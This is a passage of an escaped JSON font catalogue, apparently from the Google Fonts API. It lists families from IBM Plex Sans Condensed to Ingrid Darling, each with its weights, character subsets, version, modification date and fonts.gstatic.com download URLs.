\"http://fonts.gstatic.com/s/ibmplexsanscondensed/v13/Gg8iN4UfRSqiPg7Jn2ZI12V4DCEwkj1E4LVeHYas8HPvpYMnEhq5H1w.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/ibmplexsanscondensed/v13/Gg8gN4UfRSqiPg7Jn2ZI12V4DCEwkj1E4LVeHY4S7Yvrr4cFFwq5.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/ibmplexsanscondensed/v13/Gg8iN4UfRSqiPg7Jn2ZI12V4DCEwkj1E4LVeHYas8BfupYMnEhq5H1w.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"IBM Plex Sans Devanagari\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"cyrillic-ext\",\n        \"devanagari\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v9\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/ibmplexsansdevanagari/v9/XRXB3JCMvG4IDoS9SubXB6W-UX5iehIMBFR2-O_HMUjwUcjwCEQq.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/ibmplexsansdevanagari/v9/XRXA3JCMvG4IDoS9SubXB6W-UX5iehIMBFR2-O_HnWnQe-b8AV0z0w.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/ibmplexsansdevanagari/v9/XRXA3JCMvG4IDoS9SubXB6W-UX5iehIMBFR2-O_H-WrQe-b8AV0z0w.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/ibmplexsansdevanagari/v9/XRXH3JCMvG4IDoS9SubXB6W-UX5iehIMBFR2-O__VUL0c83gCA.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/ibmplexsansdevanagari/v9/XRXA3JCMvG4IDoS9SubXB6W-UX5iehIMBFR2-O_HoWvQe-b8AV0z0w.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/ibmplexsansdevanagari/v9/XRXA3JCMvG4IDoS9SubXB6W-UX5iehIMBFR2-O_HjWzQe-b8AV0z0w.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/ibmplexsansdevanagari/v9/XRXA3JCMvG4IDoS9SubXB6W-UX5iehIMBFR2-O_H6W3Qe-b8AV0z0w.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"IBM Plex Sans Hebrew\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"cyrillic-ext\",\n        \"hebrew\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v10\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/ibmplexsanshebrew/v10/BCa4qYENg9Kw1mpLpO0bGM5lfHAAZHhDXEXB-l0VqDaM7C4.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/ibmplexsanshebrew/v10/BCa5qYENg9Kw1mpLpO0bGM5lfHAAZHhDXEVt230_hjqF9Tc2.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/ibmplexsanshebrew/v10/BCa5qYENg9Kw1mpLpO0bGM5lfHAAZHhDXEUJ2H0_hjqF9Tc2.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/ibmplexsanshebrew/v10/BCa2qYENg9Kw1mpLpO0bGM5lfHAAZHhDXH2l8Fk3rSaM.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/ibmplexsanshebrew/v10/BCa5qYENg9Kw1mpLpO0bGM5lfHAAZHhDXEVR2X0_hjqF9Tc2.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/ibmplexsanshebrew/v10/BCa5qYENg9Kw1mpLpO0bGM5lfHAAZHhDXEV93n0_hjqF9Tc2.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/ibmplexsanshebrew/v10/BCa5qYENg9Kw1mpLpO0bGM5lfHAAZHhDXEUZ330_hjqF9Tc2.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"IBM Plex Sans JP\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"japanese\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v3\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/ibmplexsansjp/v3/Z9XLDn9KbTDf6_f7dISNqYf_tvPT7E7yjPB7twdmHQ.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/ibmplexsansjp/v3/Z9XKDn9KbTDf6_f7dISNqYf_tvPT7OLTrNpVuw5_BAM.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/ibmplexsansjp/v3/Z9XKDn9KbTDf6_f7dISNqYf_tvPT7IbQrNpVuw5_BAM.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/ibmplexsansjp/v3/Z9XNDn9KbTDf6_f7dISNqYf_tvPT1Cr4iNJ-pwc.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/ibmplexsansjp/v3/Z9XKDn9KbTDf6_f7dISNqYf_tvPT7N7RrNpVuw5_BAM.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/ibmplexsansjp/v3/Z9XKDn9KbTDf6_f7dISNqYf_tvPT7PLWrNpVuw5_BAM.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/ibmplexsansjp/v3/Z9XKDn9KbTDf6_f7dISNqYf_tvPT7JbXrNpVuw5_BAM.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"IBM Plex Sans KR\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"korean\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v9\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/ibmplexsanskr/v9/vEFM2-VJISZe3O_rc3ZVYh4aTwNOyra_X5zCpMrMfA.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/ibmplexsanskr/v9/vEFN2-VJISZe3O_rc3ZVYh4aTwNOyhqef7bsqMPVZb4.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/ibmplexsanskr/v9/vEFN2-VJISZe3O_rc3ZVYh4aTwNOyn6df7bsqMPVZb4.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/ibmplexsanskr/v9/vEFK2-VJISZe3O_rc3ZVYh4aTwNO8tK1W77HtMo.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/ibmplexsanskr/v9/vEFN2-VJISZe3O_rc3ZVYh4aTwNOyiacf7bsqMPVZb4.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/ibmplexsanskr/v9/vEFN2-VJISZe3O_rc3ZVYh4aTwNOygqbf7bsqMPVZb4.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/ibmplexsanskr/v9/vEFN2-VJISZe3O_rc3ZVYh4aTwNOym6af7bsqMPVZb4.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"IBM Plex Sans Thai\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"cyrillic-ext\",\n        \"latin\",\n        \"latin-ext\",\n        \"thai\"\n      ],\n      \"version\": \"v9\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/ibmplexsansthai/v9/m8JNje1VVIzcq1HzJq2AEdo2Tj_qvLqEatYlR8ZKUqcX.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/ibmplexsansthai/v9/m8JMje1VVIzcq1HzJq2AEdo2Tj_qvLqExvcFbehGW74OXw.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/ibmplexsansthai/v9/m8JMje1VVIzcq1HzJq2AEdo2Tj_qvLqEovQFbehGW74OXw.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/ibmplexsansthai/v9/m8JPje1VVIzcq1HzJq2AEdo2Tj_qvLq8DtwhZcNaUg.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/ibmplexsansthai/v9/m8JMje1VVIzcq1HzJq2AEdo2Tj_qvLqE-vUFbehGW74OXw.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/ibmplexsansthai/v9/m8JMje1VVIzcq1HzJq2AEdo2Tj_qvLqE1vIFbehGW74OXw.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/ibmplexsansthai/v9/m8JMje1VVIzcq1HzJq2AEdo2Tj_qvLqEsvMFbehGW74OXw.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"IBM Plex Sans Thai Looped\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"cyrillic-ext\",\n        \"latin\",\n        \"latin-ext\",\n        \"thai\"\n      ],\n      \"version\": \"v9\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/ibmplexsansthailooped/v9/tss5AoJJRAhL3BTrK3r2xxbFhvKfyBB6l7hHT30L_HaKpHOtFCQ76Q.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/ibmplexsansthailooped/v9/tss6AoJJRAhL3BTrK3r2xxbFhvKfyBB6l7hHT30L_NqrhFmDGC0i8Cc.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/ibmplexsansthailooped/v9/tss6AoJJRAhL3BTrK3r2xxbFhvKfyBB6l7hHT30L_L6ohFmDGC0i8Cc.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/ibmplexsansthailooped/v9/tss_AoJJRAhL3BTrK3r2xxbFhvKfyBB6l7hHT30LxBKAoFGoBCQ.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/ibmplexsansthailooped/v9/tss6AoJJRAhL3BTrK3r2xxbFhvKfyBB6l7hHT30L_OaphFmDGC0i8Cc.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/ibmplexsansthailooped/v9/tss6AoJJRAhL3BTrK3r2xxbFhvKfyBB6l7hHT30L_MquhFmDGC0i8Cc.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/ibmplexsansthailooped/v9/tss6AoJJRAhL3BTrK3r2xxbFhvKfyBB6l7hHT30L_K6vhFmDGC0i8Cc.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"IBM Plex Serif\",\n      \"variants\": [\n        \"100\",\n        \"100italic\",\n        \"200\",\n        \"200italic\",\n        \"300\",\n        \"300italic\",\n        \"regular\",\n        \"italic\",\n        \"500\",\n        \"500italic\",\n        \"600\",\n        \"600italic\",\n        \"700\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/ibmplexserif/v15/jizBREVNn1dOx-zrZ2X3pZvkTi182zIZj1bIkNo.ttf\",\n        \"100italic\": \"http://fonts.gstatic.com/s/ibmplexserif/v15/jizHREVNn1dOx-zrZ2X3pZvkTiUa41YTi3TNgNq55w.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/ibmplexserif/v15/jizAREVNn1dOx-zrZ2X3pZvkTi3Q-hIzoVrBicOg.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/ibmplexserif/v15/jizGREVNn1dOx-zrZ2X3pZvkTiUa4_oyq17jjNOg_oc.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/ibmplexserif/v15/jizAREVNn1dOx-zrZ2X3pZvkTi20-RIzoVrBicOg.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/ibmplexserif/v15/jizGREVNn1dOx-zrZ2X3pZvkTiUa454xq17jjNOg_oc.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/ibmplexserif/v15/jizDREVNn1dOx-zrZ2X3pZvkThUY0TY7ikbI.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/ibmplexserif/v15/jizBREVNn1dOx-zrZ2X3pZvkTiUa2zIZj1bIkNo.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/ibmplexserif/v15/jizAREVNn1dOx-zrZ2X3pZvkTi3s-BIzoVrBicOg.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/ibmplexserif/v15/jizGREVNn1dOx-zrZ2X3pZvkTiUa48Ywq17jjNOg_oc.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/ibmplexserif/v15/jizAREVNn1dOx-zrZ2X3pZvkTi3A_xIzoVrBicOg.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/ibmplexserif/v15/jizGREVNn1dOx-zrZ2X3pZvkTiUa4-o3q17jjNOg_oc.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/ibmplexserif/v15/jizAREVNn1dOx-zrZ2X3pZvkTi2k_hIzoVrBicOg.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/ibmplexserif/v15/jizGREVNn1dOx-zrZ2X3pZvkTiUa4442q17jjNOg_oc.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"IM Fell DW Pica\",\n      \"variants\": [\n        \"regular\",\n        \"italic\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/imfelldwpica/v16/2sDGZGRQotv9nbn2qSl0TxXVYNw9ZAPUvi88MQ.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/imfelldwpica/v16/2sDEZGRQotv9nbn2qSl0TxXVYNwNZgnQnCosMXm0.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"IM Fell DW Pica SC\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/imfelldwpicasc/v21/0ybjGCAu5PfqkvtGVU15aBhXz3EUrnTW-BiKEUiBGA.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"IM Fell Double Pica\",\n      \"variants\": [\n        \"regular\",\n        \"italic\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/imfelldoublepica/v14/3XF2EqMq_94s9PeKF7Fg4gOKINyMtZ8rT0S1UL5Ayp0.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/imfelldoublepica/v14/3XF0EqMq_94s9PeKF7Fg4gOKINyMtZ8rf0a_VJxF2p2G8g.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"IM Fell Double Pica SC\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/imfelldoublepicasc/v21/neIazDmuiMkFo6zj_sHpQ8teNbWlwBB_hXjJ4Y0Eeru2dGg.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"IM Fell English\",\n      \"variants\": [\n        \"regular\",\n        \"italic\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/imfellenglish/v14/Ktk1ALSLW8zDe0rthJysWrnLsAz3F6mZVY9Y5w.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/imfellenglish/v14/Ktk3ALSLW8zDe0rthJysWrnLsAzHFaOdd4pI59zg.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"IM Fell English SC\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/imfellenglishsc/v16/a8IENpD3CDX-4zrWfr1VY879qFF05pZLO4gOg0shzA.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"IM Fell French Canon\",\n      \"variants\": [\n        \"regular\",\n        \"italic\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/imfellfrenchcanon/v21/-F6ufiNtDWYfYc-tDiyiw08rrghJszkK6coVPt1ozoPz.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/imfellfrenchcanon/v21/-F6gfiNtDWYfYc-tDiyiw08rrghJszkK6foXNNlKy5PzzrU.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"IM Fell French Canon SC\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v22\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/imfellfrenchcanonsc/v22/FBVmdCru5-ifcor2bgq9V89khWcmQghEURY7H3c0UBCVIVqH.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"IM Fell Great Primer\",\n      \"variants\": [\n        \"regular\",\n        \"italic\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/imfellgreatprimer/v21/bx6aNwSJtayYxOkbYFsT6hMsLzX7u85rJorXvDo3SQY1.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/imfellgreatprimer/v21/bx6UNwSJtayYxOkbYFsT6hMsLzX7u85rJrrVtj4VTBY1N6U.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"IM Fell Great Primer SC\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/imfellgreatprimersc/v21/ga6daxBOxyt6sCqz3fjZCTFCTUDMHagsQKdDTLf9BXz0s8FG.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Ibarra Real Nova\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/ibarrarealnova/v20/sZlSdQiA-DBIDCcaWtQzL4BZHoiDundw4ATyjed3EXdg5MDtVT9TWIvS.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/ibarrarealnova/v20/sZlSdQiA-DBIDCcaWtQzL4BZHoiDundw4ATyjed3EXdS5MDtVT9TWIvS.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/ibarrarealnova/v20/sZlSdQiA-DBIDCcaWtQzL4BZHoiDundw4ATyjed3EXe-48DtVT9TWIvS.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/ibarrarealnova/v20/sZlSdQiA-DBIDCcaWtQzL4BZHoiDundw4ATyjed3EXeH48DtVT9TWIvS.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/ibarrarealnova/v20/sZlsdQiA-DBIDCcaWtQzL4BZHoiDkH5CH9yb5n3ZFmKopyiuXztxXZvSkTo.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/ibarrarealnova/v20/sZlsdQiA-DBIDCcaWtQzL4BZHoiDkH5CH9yb5n3ZFmKopxquXztxXZvSkTo.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/ibarrarealnova/v20/sZlsdQiA-DBIDCcaWtQzL4BZHoiDkH5CH9yb5n3ZFmKop_apXztxXZvSkTo.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/ibarrarealnova/v20/sZlsdQiA-DBIDCcaWtQzL4BZHoiDkH5CH9yb5n3ZFmKop8-pXztxXZvSkTo.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Iceberg\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-04-26\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/iceberg/v20/8QIJdijAiM7o-qnZuIgOq7jkAOw.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Iceland\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-04-26\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/iceland/v16/rax9HiuFsdMNOnWPWKxGADBbg0s.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Imbue\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/imbue/v21/RLpXK5P16Ki3fXhj5cvGrqjocPk4n-gVX3M93TnrnvhoP8iWfOsNNK-Q4xY.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/imbue/v21/RLpXK5P16Ki3fXhj5cvGrqjocPk4n-gVX3M93TnrnvhoP0iXfOsNNK-Q4xY.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/imbue/v21/RLpXK5P16Ki3fXhj5cvGrqjocPk4n-gVX3M93TnrnvhoP5aXfOsNNK-Q4xY.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/imbue/v21/RLpXK5P16Ki3fXhj5cvGrqjocPk4n-gVX3M93TnrnvhoP8iXfOsNNK-Q4xY.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/imbue/v21/RLpXK5P16Ki3fXhj5cvGrqjocPk4n-gVX3M93TnrnvhoP_qXfOsNNK-Q4xY.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/imbue/v21/RLpXK5P16Ki3fXhj5cvGrqjocPk4n-gVX3M93TnrnvhoPxaQfOsNNK-Q4xY.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/imbue/v21/RLpXK5P16Ki3fXhj5cvGrqjocPk4n-gVX3M93TnrnvhoPy-QfOsNNK-Q4xY.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/imbue/v21/RLpXK5P16Ki3fXhj5cvGrqjocPk4n-gVX3M93TnrnvhoP0iQfOsNNK-Q4xY.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/imbue/v21/RLpXK5P16Ki3fXhj5cvGrqjocPk4n-gVX3M93TnrnvhoP2GQfOsNNK-Q4xY.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Imperial Script\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v3\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/imperialscript/v3/5DCPAKrpzy_H98IV2ISnZBbGrVNvPenlvttWNg.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Imprima\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/imprima/v16/VEMxRoN7sY3yuy-7-oWHyDzktPo.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Inconsolata\",\n      \"variants\": [\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v31\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"200\": \"http://fonts.gstatic.com/s/inconsolata/v31/QldgNThLqRwH-OJ1UHjlKENVzkWGVkL3GZQmAwLYxYWI2qfdm7LppwU8aRr8lleY2co.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/inconsolata/v31/QldgNThLqRwH-OJ1UHjlKENVzkWGVkL3GZQmAwLYxYWI2qfdm7Lpp9s8aRr8lleY2co.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/inconsolata/v31/QldgNThLqRwH-OJ1UHjlKENVzkWGVkL3GZQmAwLYxYWI2qfdm7Lpp4U8aRr8lleY2co.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/inconsolata/v31/QldgNThLqRwH-OJ1UHjlKENVzkWGVkL3GZQmAwLYxYWI2qfdm7Lpp7c8aRr8lleY2co.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/inconsolata/v31/QldgNThLqRwH-OJ1UHjlKENVzkWGVkL3GZQmAwLYxYWI2qfdm7Lpp1s7aRr8lleY2co.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/inconsolata/v31/QldgNThLqRwH-OJ1UHjlKENVzkWGVkL3GZQmAwLYxYWI2qfdm7Lpp2I7aRr8lleY2co.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/inconsolata/v31/QldgNThLqRwH-OJ1UHjlKENVzkWGVkL3GZQmAwLYxYWI2qfdm7LppwU7aRr8lleY2co.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/inconsolata/v31/QldgNThLqRwH-OJ1UHjlKENVzkWGVkL3GZQmAwLYxYWI2qfdm7Lppyw7aRr8lleY2co.ttf\"\n      },\n      \"category\": \"monospace\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Inder\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/inder/v14/w8gUH2YoQe8_4vq6pw-P3U4O.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Indie Flower\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/indieflower/v17/m8JVjfNVeKWVnh3QMuKkFcZlbkGG1dKEDw.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Ingrid Darling\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v2\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/ingriddarling/v2/LDIrapaJNxUtSuFdw-9yf4rCPsLOub458jGL.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      